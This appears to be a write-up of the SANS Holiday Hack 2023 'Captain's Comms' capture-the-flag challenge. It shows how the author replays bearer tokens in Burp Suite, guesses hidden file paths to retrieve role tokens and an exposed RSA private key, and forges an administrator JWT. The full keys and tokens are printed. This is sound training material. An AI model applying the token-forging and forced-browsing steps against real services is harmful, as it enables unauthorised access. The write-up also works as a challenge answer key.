Heya, think you could help Piney Sappington on Rainraster Cliffs on Pixel Island and then give me a hand?
After solving the objective Elf Hunt from Piney Sappington:
Ahoy there, I'm Chimney Scissorsticks!
You may have noticed some mischief-makers planning to stir up trouble ashore.
They've made many radio broadcasts which the captain has been monitoring with his new software defined radio (SDR).
The new SDR uses some fancy JWT technology to control access.
The captain has a knack for shortening words, some sorta abbreviation trick.
Not familiar with JWT values? No worries; just think of it as a clue-solving game.
I've seen that the Captain likes to carry his journal with him wherever he goes.
If only I could find the planned "go-date", "go-time", and radio frequency they plan to use.
Remember, the captain's abbreviations are your guiding light through this mystery!
Once we find a JWT value, these villains won't stand a chance.
The closer we are, the sooner we'll be thwarting their pesky plans!
We need to recreate an administrative JWT value to successfully transmit a message.
Good luck, matey! I've no doubts about your cleverness in cracking this conundrum!
And we get the following hints:
I hear the Captain likes to abbreviate words in his filenames; shortening some words to just 1,2,3, or 4 letters.
Web Interception proxies like Burp and Zap make web sites fun!
I've seen the Captain with his Journal visiting Pixel Island!
A great introduction to JSON Web Tokens is available from Auth0.
Find a private key, update an existing JWT!
First, we open a proxy, e.g. the Burp Suite
, to make it easier to process our requests later. Burp Suite also contains the appropriately configured browser in which we start the game.
The first thing we see is a help window:
The newly appointed Geese Islands Communications Captacn has been
monitoring some off-shore transmissions using the newly installed
'Just Watch This' Software Defined Radio (SDR) system. The Captain
suspects that a group of miscreants sailing about the islands plan to
come ashore and cause trouble. The Captain would like to find their
anticipated 'go-time' frequency, the planned date and hour for their
incursion, and lure the miscreants ashore at a time when the island
authorities are sufficiently prepared and ready by transmitting a
message announcing a new 'go-time' which is four hours earlier than
what the miscreants have planned.
Different items in the communications area may be interacted With by
clicking on them. Some (but not all) items will show a thin yellow
border if they're interactive. Some items will require AUTHORIZATION
With a different ROLE not immediately granted when entering the
communications shack. Explore the Captain's Comms, learn how to use
the 'Just Watch This' SDR, and use the Captain's transmitter to send
the misleading message With the correct frequency, date, and new time
to prevent he miscreants from interrupting everyone's holiday cheer.
There are many interactive areas. The complete overview can be seen here:
When we try to use the Captain's SDR, we get an error message:
Unauthorized Access!
radioMonitor Users Only!
For the first start, only the manuals and notes are available to us. However, these contain everything we need to get ahead.
Here is the first hint:
During the installation of your Just Watch This
radio system, the 'rMonitor.tok' file containing the
'radioMonitor' role token was created in the
'/jwtDefault' directory.
Let's open the following URL in a second tab: https://captainscomms.com/jwtDefault/rMonitor.tok
Invalid authorization token provided.
That was clear, of course. The bearer token is missing in this call in a separate tab. We copy a token from an original request and insert it into Burp Suite via the repeater. If we now send the request again, we get access:
eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJISEMgMjAyMyBDYXB0YWluJ3MgQ29tbXMiLCJpYXQiOjE2OTk0ODU3OTUuMzQwMzMyNywiZXhwIjoxODA5OTM3Mzk1LjM0MDMzMjcsImF1ZCI6IkhvbGlkYXkgSGFjayAyMDIzIiwicm9sZSI6InJhZGlvTW9uaXRvciJ9.f_z24CMLim2JDKf8KP_PsJmMg3l_V9OzEwK1E_IBE9rrIGRVBZjqGpvTqAQQSesJD82LhK2h8dCcvUcF7awiAPpgZpcfM5jdkXR7DAKzaHAV0OwTRS6x_Uuo6tqGMu4XZVjGzTvba-eMGTHXyfekvtZr8uLLhvNxoarCrDLiwZ_cKLViRojGuRIhGAQCpumw6NTyLuUYovy_iymNfe7pqsXQNL_iyoUwWxfWcfwch7eGmf2mBrdEiTB6LZJ1ar0FONfrLGX19TV25Qy8auNWQIn6jczWM9WcZbuOIfOvlvKhyVWbPdAK3zB7OOm-DbWm1aFNYKr6JIRDLobPfiqhKg
If we copy this JWT token to https://jwt.io/ we can see that this token belongs to the radioMonitor role. We should now be able to use the Captain's SDR. To do this, we send the request back through the repeater when we open the Captain's SDR and replace the bearer token with the one we have just received:
Here is the second hint:
(Status: I moved the private key to a
folder I hope no one will find. I created
a 'keys' folder in the same directory
the 'roleMonitor' token is in and put
the public key 'capsPubKey.key' there.)
Once we have the roleMonitor
token, we also get the public key so that we can issue our own tokens. Let's call up the following URL with our new Bearer Token: https://captainscomms.com/jwtDefault/keys/capsPubKey.key
-----BEGIN PUBLIC KEY-----
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAsJZuLJVB4EftUOQN1Auw
VzJyr1Ma4xFo6EsEzrkprnQcdgwz2iMM76IEiH8FlgKZG1U0RU4N3suI24NJsb5w
J327IYXAuOLBLzIN65nQhJ9wBPR7Wd4Eoo2wJP2m2HKwkW5Yadj6T2YgwZLmod3q
n6JlhN03DOk1biNuLDyWao+MPmg2RcxDR2PRnfBartzw0HPB1yC2Sp33eDGkpIXa
cx/lGVHFVxE1ptXP+asOAzK1wEezyDjyUxZcMMmV0VibzeXbxsXYvV3knScr2WYO
qZ5ssa4Rah9sWnm0CKG638/lVD9kwbvcO2lMlUeTp7vwOTXEGyadpB0WsuIKuPH6
uQIDAQAB
-----END PUBLIC KEY-----
Here is the third hint:
With the SDR window open, simply Click
on a signal peak while using the
'radioDecoder' ROLE token in order to
hear and decode a signal..
Here we have to guess a little. We already know that the token is called rMonitor.tok
for the radioMonitor
role. So let's just try it with a token called rDecoder.tok for a radioDecoder role and call the following URL: https://captainscomms.com/jwtDefault/rDecoder.tok
eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJISEMgMjAyMyBDYXB0YWluJ3MgQ29tbXMiLCJpYXQiOjE2OTk0ODU3OTUuMzQwMzMyNywiZXhwIjoxODA5OTM3Mzk1LjM0MDMzMjcsImF1ZCI6IkhvbGlkYXkgSGFjayAyMDIzIiwicm9sZSI6InJhZGlvRGVjb2RlciJ9.cnNu6EjIDBrq8PbMlQNF7GzTqtOOLO0Q2zAKBRuza9bHMZGFx0pOmeCy2Ltv7NUPv1yT9NZ-WapQ1-GNcw011Ssbxz0yQO3Mh2Tt3rS65dmb5cmYIZc0pol-imtclWh5s1OTGUtqSjbeeZ2QAMUFx3Ad93gR20pKpjmoeG_Iec4JHLTJVEksogowOouGyDxNAagIICSpe61F3MY1qTibOLSbq3UVfiIJS4XvGJwqbYfLdbhc-FvHWBUbHhAzIgTIyx6kfONOH9JBo2RRQKvN-0K37aJRTqbq99mS4P9PEVs0-YIIufUxJGIW0TdMNuVO3or6bIeVH6CjexIl14w6fg
With our new role, we can now use all areas in the Captain's SDR and receive the following information when clicking on the other areas:
https://captainscomms.com/static/images/dcdCW.mp4
... CQ CQ CQ DE KH644 -- SILLY CAPTAIN! WE FOUND HIS FANCY RADIO
PRIVATE KEY IN A FOLDER CALLED TH3CAPSPR1V4T3F0LD3R ...
https://captainscomms.com/static/images/dcdFX.mp4
Freq: 10426 Hz
https://captainscomms.com/static/images/dcdNUM.mp4
{music} {music} {music} 88323 88323 88323 {gong} {gong} {gong}
{gong} {gong} {gong} 12249 12249 16009 16009 12249 12249 16009
16009 {gong} {gong} {gong} {gong} {gong} {gong} {music} {music}
{music}
Now let's get the last piece of the puzzle, the private key. We now know the folder from the clues, the name requires a bit of guesswork again. We know the name of the public key, so we can quickly think of a possible name for the private key: https://captainscomms.com/jwtDefault/keys/TH3CAPSPR1V4T3F0LD3R/capsPrivKey.key
-----BEGIN PRIVATE KEY-----
MIIEvgIBADANBgkqhkiG9w0BAQEFAASCBKgwggSkAgEAAoIBAQCwlm4slUHgR+1Q
5A3UC7BXMnKvUxrjEWjoSwTOuSmudBx2DDPaIwzvogSIfwWWApkbVTRFTg3ey4jb
g0mxvnAnfbshhcC44sEvMg3rmdCEn3AE9HtZ3gSijbAk/abYcrCRblhp2PpPZiDB
kuah3eqfomWE3TcM6TVuI24sPJZqj4w+aDZFzENHY9Gd8Fqu3PDQc8HXILZKnfd4
MaSkhdpzH+UZUcVXETWm1c/5qw4DMrXAR7PIOPJTFlwwyZXRWJvN5dvGxdi9XeSd
JyvZZg6pnmyxrhFqH2xaebQIobrfz+VUP2TBu9w7aUyVR5Onu/A5NcQbJp2kHRay
4gq48fq5AgMBAAECggEATlcmYJQE6i2uvFS4R8q5vC1u0JYzVupJ2sgxRU7DDZiI
adyHAm7LVeJQVYfYoBDeANC/hEGZCK7OM+heQMMGOZbfdoNCmSNL5ha0M0IFTlj3
VtNph9hlwQHP09FN/DeBWruT8L1oauIZhRcZR1VOuexPUm7bddheMlL4lRp59qKj
9k1hUQ3R3qAYST2EnqpEk1NV3TirnhIcAod53aAzcAqg/VruoPhdwmSv/xrfDS9R
DCxOzplHbVQ7sxZSt6URO/El6BrkvVvJEqECMUdON4agNEK5IYAFuIbETFNSu1TP
/dMvnR1fpM0lPOXeUKPNFveGKCc7B4IF2aDQ/CvD+wKBgQDpJjHSbtABNaJqVJ3N
/pMROk+UkTbSW69CgiH03TNJ9RflVMphwNfFJqwcWUwIEsBpe+Wa3xE0ZatecEM9
4PevvXGujmfskst/PuCuDwHnQ5OkRwaGIkujmBaNFmpkF+51v6LNdnt8UPGrkovD
onQIEjmvS1b53eUhDI91eysPKwKBgQDB5RVaS7huAJGJOgMpKzu54N6uljSwoisz
YJRY+5V0h65PucmZHPHe4/+cSUuuhMWOPinr+tbZtwYaiX04CNK1s8u4qqcX2ZRD
YuEv+WNDv2e1XjoWCTxfP71EorywkEyCnZq5kax3cPOqBs4UvSmsR9JiYKdeXfaC
VGiUyJgLqwKBgQDL+VZtO/VOmZXWYOEOb0JLODCXUdQchYn3LdJ3X26XrY2SXXQR
wZ0EJqk8xAL4rS8ZGgPuUmnC5Y/ft2eco00OuzbR+FSDbIoMcP4wSYDoyv5IIrta
bnauUUipdorttuIwsc/E4Xt3b3l/GV6dcWsCBK/i5I7bW34yQ8LejTtGsQKBgAmx
NdwJpPJ6vMurRrUsIBQulXMMtx2NPbOXxFKeYN4uWhxKITWyKLUHmKNrVokmwelW
Wiodo9fGOlvhO40tg7rpfemBPlEG405rBu6q/LdKPhjm2Oh5Fbd9LCzeJah9zhVJ
Y46bJY/i6Ys6Q9rticO+41lfk344HDZvmbq2PEN5AoGBANrYUVhKdTY0OmxLOrBb
kk8qpMhJycpmLFwymvFf0j3dWzwo8cY/+2zCFEtv6t1r7b8bjz/NYrwS0GvEc6Bj
xVa9JIGLTKZt+VRYMP1V+uJEmgSnwUFKrXPrAsyRaMcq0HAvQOMICX4ZvGyzWhut
UdQXV73mNwnYl0RQmBnDOl+i
-----END PRIVATE KEY-----
From the Captain's diary, which we also found, we also know the role we need to play in order to use the Captain's Transmitter: GeeseIslandsSuperChiefCommunicationsOfficer
So let's go back to https://jwt.io/ and create a token by entering everything we found out earlier:
HEADER:ALGORITHM & TOKEN TYPE
{
"alg": "RS256",
"typ": "JWT"
}
PAYLOAD:DATA
{
"iss": "HHC 2023 Captain's Comms",
"iat": 1699485795.3403327,
"exp": 1809937395.3403327,
"aud": "Holiday Hack 2023",
"role": "GeeseIslandsSuperChiefCommunicationsOfficer"
}
VERIFY SIGNATURE
<insert public and private key from above>
eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJISEMgMjAyMyBDYXB0YWluJ3MgQ29tbXMiLCJpYXQiOjE2OTk0ODU3OTUuMzQwMzMyNywiZXhwIjoxODA5OTM3Mzk1LjM0MDMzMjcsImF1ZCI6IkhvbGlkYXkgSGFjayAyMDIzIiwicm9sZSI6IkdlZXNlSXNsYW5kc1N1cGVyQ2hpZWZDb21tdW5pY2F0aW9uc09mZmljZXIifQ.N-8MdT6yPFge7zERpm4VdLdVLMyYcY_Wza1TADoGKK5_85Y5ua59z2Ke0TTyQPa14Z7_Su5CpHZMoxThIEHUWqMzZ8MceUmNGzzIsML7iFQElSsLmBMytHcm9-qzL0Bqb5MeqoHZYTxN0vYG7WaGihYDTB7OxkoO_r4uPSQC8swFJjfazecCqIvl4T5i08p5Ur180GxgEaB-o4fpg_OgReD91ThJXPt7wZd9xMoQjSuPqTPiYrP5o-aaQMcNhSkMix_RX1UGrU-2sBlL01FxI7SjxPYu4eQbACvuK6G2wyuvaQIclGB2Qh3P7rAOTpksZSex9RjtKOiLMCafTyfFng
Now we start the Captain's Transmitter and make sure that we give exactly this Bearer Token:
After all, we are supposed to transmit a signal that is 4 hours before the actually announced time. In order to arrive at the correct values, a bit of fiddling is required.
We already know the frequency: Freq: 10426 Hz (from the transmitter)
We assume the date to be 1224 (24 December) (from the transmitter) and the time to be 1200 (also from the transmitter, but not 16:00 but 12:00).
We enter the whole thing in exactly the same way and press the TX button to send our message:
Yeah, we succeeded!
Chimney Scissorsticks adds:
Brilliant work! You've outsmarted those scoundrels with finesse!